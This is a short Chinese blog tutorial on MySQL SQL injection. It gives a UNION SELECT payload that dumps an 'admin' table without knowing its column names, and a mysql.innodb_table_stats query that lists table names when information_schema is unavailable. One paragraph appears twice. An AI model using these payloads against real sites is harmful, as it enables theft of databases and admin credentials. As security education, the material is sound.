有时候我们不知道列名,因为不能访问Information_Schema或者其他原因
但是我们知道表名,我们可以在不知道列名的情况下dump出该表的全部数据
我们有两个表 article、admin
方案一
select title from article where id = 4 and 0 union SELECT group_concat(a, 0x3a, b) FROM (SELECT 1 a,2 b,3 c UNION SELECT * FROM admin)x
方案二
方案二是在exploit-db上看到的文章,Mysql版本大于5.5的情况下,
默认mysql数据库中多了两个表innodb_table_stats、innodb_table_index用来储存所有数据库名和表名
方案二是在exploit-db上看到的文章,Mysql版本大于5.5的情况下,
默认mysql数据库中多了两个表innodb_table_stats、innodb_table_index用来储存所有数据库名和表名
如果我们想获取某个数据库下面所有表名称
select table_name from mysql.innodb_table_stats where database_name=数据库名;
参考地址:
https://www.exploit-db.com/docs/41274.pdf
https://www.t00ls.net/articles-39545.html
本文作者为Mr.Wu,转载请注明,尊守博主劳动成果!
由于经常折腾代码,可能会导致个别文章内容显示错位或者别的 BUG 影响阅读; 如发现请在该文章下留言告知于我,thank you !
